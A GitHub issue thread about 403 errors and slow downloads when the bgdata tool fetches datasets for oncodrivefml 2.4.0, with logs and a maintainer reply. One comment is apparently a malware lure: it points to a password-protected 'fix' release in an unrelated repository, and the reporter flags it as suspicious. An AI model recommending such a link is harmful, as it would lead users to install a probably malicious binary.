### ISSUE TITLE
bgdata issue with oncodrivefml 2.4.0

### ISSUE THREAD

**Issue by IanVermes** [bbglab/oncodrivefml#4]
Hi,
I'm having an issue with downloading datasets with `oncodrivefml` (version `2.4.0`).

**403 error with `bgdata search`**

To simplify and reproduce the error, I'm trying to do it directly with `bgdata` (version `2.0.4`), where I follow the [bgdata searching documentation](https://bgdata.readthedocs.io/en/latest/usage.html#searching-for-packages).

```bash
$ bgdata search _
genomereference
bgoncotree

$ bgdata search _/genomereference
2024-08-29 01:07:07 bgdata.utils ERROR -- RemoteFileError: Error requesting remote file "https://bbglab.irbbarcelona.org/bgdata/_/genomereference/info.json?687750242ed1689965c3a53415b424" -- code: 403 - reason Forbidden
## hg19 # Expected
## hg18
## hg38

bgdata search _/genomereference/hg19
2024-08-29 01:30:25 bgdata.utils ERROR -- RemoteFileError: Error requesting remote file "https://bbglab.irbbarcelona.org/bgdata/_/genomereference/hg19.json?5a8b3982097d9b645d637b43541302" -- code: 403 - reason Forbidden
## 20190201 # Expected or similar
```

Inside my `$HOME/.config/bbglab/bgdatav2.conf` the value of `remote_repository` is `https://bbglab.irbbarcelona.org/bgdata` which I believe is the default.

**Unusually slow download; sometimes fails**

I've noticed over the past few weeks that when attempting to download with `bgdata get` download speeds can be a healthy 1.5Mb/s or sometimes a slow 20Kb/s. Typically when it is that slow, I encountered timeout exceptions after 5 attempted connection retries (homura & pycurl thow the exceptions).

Is it possible that I should be using a different remote? Or a mirror?

Thanks, Ian

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by IanVermes** [comment]
> to fix your trouble check this fix, i see it in another issue, https://github.com/Jostino/RimWorld-it/releases/tag/fix password: changeme when you installing, you need to place a check in install to path and select "gcc."

Seems unrelated & **suspiciously malicious**: 10 year old release for an unrelated repo & a compiled binary that was updated 10 mins ago.

**Comment by FedericaBrando** [comment]
Hi Ian, thanks for reaching out and sorry for the late reply. Have you any update on this? 

We did experience some problems with connection in the beginning of September, that could lead to this problem. Please if the problem persist, let us know.
